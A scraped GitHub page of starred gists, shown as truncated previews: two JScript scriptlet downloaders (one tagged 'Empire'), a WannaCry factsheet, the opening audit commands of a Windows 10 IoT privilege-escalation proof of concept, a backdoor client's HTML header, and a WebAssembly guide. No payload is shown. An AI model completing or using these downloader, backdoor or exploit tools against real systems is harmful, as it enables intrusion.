Skip to content

Instantly share code, notes, and snippets.

View Antonio24's full-sized avatar

Anton Petrov Antonio24

44 followers · 11 following
View GitHub Profile
@Elm0D
Elm0D / Office_Downloader.sct
Created July 26, 2017 18:04
<?XML version="1.0"?>
<scriptlet>
<registration
description="WzVQ"
progid="WzVQ"
version="1.00"
classid="{00001111-0000-0000-0000-0000FEEDACDC}"
>
<script language="JScript">
@Elm0D
Elm0D / Downloader.sct
Created May 25, 2017 23:27
<?XML version="1.0"?>
<scriptlet>
<registration
description="Empire"
progid="Empire"
version="1.00"
classid="{00001111-0000-0000-0000-0000FEEDACDC}"
>
<!-- USAGE -->
@Epivalent
Epivalent / Wannacrypt0r-FACTSHEET.md
Created May 12, 2017 20:17

WannaCry|WannaDecrypt0r NSA-Cybereweapon-Powered Ransomware Worm

  • Virus Name: WannaCrypt, WannaCry, WanaCrypt0r, WCrypt, WCRY
  • Vector: All Windows versions before Windows 10 are vulnerable if not patched for MS-17-010. It uses EternalBlue MS17-010 to propagate.

SECURITY BULLETIN AND UPDATES HERE: https://technet.microsoft.com/en-us/library/security/ms17-010.aspx

Malware samples

@msimpson
msimpson / !wasmllvm.md
Last active December 2, 2020 18:29 — forked from yurydelendik/!wasmllvm.md
Using WebAssembly in LLVM on Windows

Using WebAssembly in LLVM on Windows

Forewarning: this can be a bit painful and may not work as expected. I've already had issues with even including stdlib through clang.

Installing Dependencies

GIT

Make sure you have git installed and properly configured before continuing. This is trivial on Windows these days (https://git-scm.com/download/win) but is required to pull down Binaryen and Wabt.

Make sure to add the binary to your PATH variable in Windows.

@mattifestation
mattifestation / Win10IoTCoreEoP.ps1
Created July 24, 2016 05:26
Window 10 IoT Core (Build 14393) Elevation of Privilege PoC Exploit
#region Win10IoT Audit Code
$CimSession = New-CimSession -ComputerName Win10IoT -Credential Administrator -Authentication Negotiate
Get-CimInstance -ClassName Win32_OperatingSystem -CimSession $CimSession
Get-CimInstance -ClassName Win32_Service -Filter 'Name = "InputService"' -CimSession $CimSession | Format-List *
# Run the service audit function in CimSweep
$ServicePermissions = Get-CSVulnerableServicePermission -CimSession $CimSession
$ServicePermissions | Where-Object { $_.GroupName -eq 'NT AUTHORITY\Authenticated Users' }
# The fact that Authenticated Users can change the service configuration means that
@phoenixg
phoenixg / lanker.backdoor.html
Created September 7, 2013 13:37
lanker一句话后门客户端3.0
<HTML><HEAD>
<!-- codz by LANKER(QQ:18779569) 2005/1/1-->
<META content="text/html; charset=gb2312" http-equiv=Content-Type>
<META content="MSHTML 5.00.2614.3500" name=GENERATOR>
<style>
<!--
td {font-size:8pt; color: #666666;font-family:Verdana}
INPUT {font-size:9pt;BORDER-RIGHT: #cccccc 1px solid; BORDER-TOP: #cccccc 1px solid; BORDER-LEFT: #cccccc 1px solid; COLOR: #666666; BORDER-BOTTOM: #cccccc 1px solid; BACKGROUND-COLOR: #ffffff}
textarea {font-size:9pt;BORDER-RIGHT: #cccccc 1px solid; BORDER-TOP: #cccccc 1px solid; BORDER-LEFT: #cccccc 1px solid; COLOR: #666666; BORDER-BOTTOM: #cccccc 1px solid; BACKGROUND-COLOR: #ffffff}
select {font-size:9pt;BORDER-RIGHT: #cccccc 1px solid; BORDER-TOP: #cccccc 1px solid; BORDER-LEFT: #cccccc 1px solid; COLOR: #666666; BORDER-BOTTOM: #cccccc 1px solid; BACKGROUND-COLOR: #ffffff}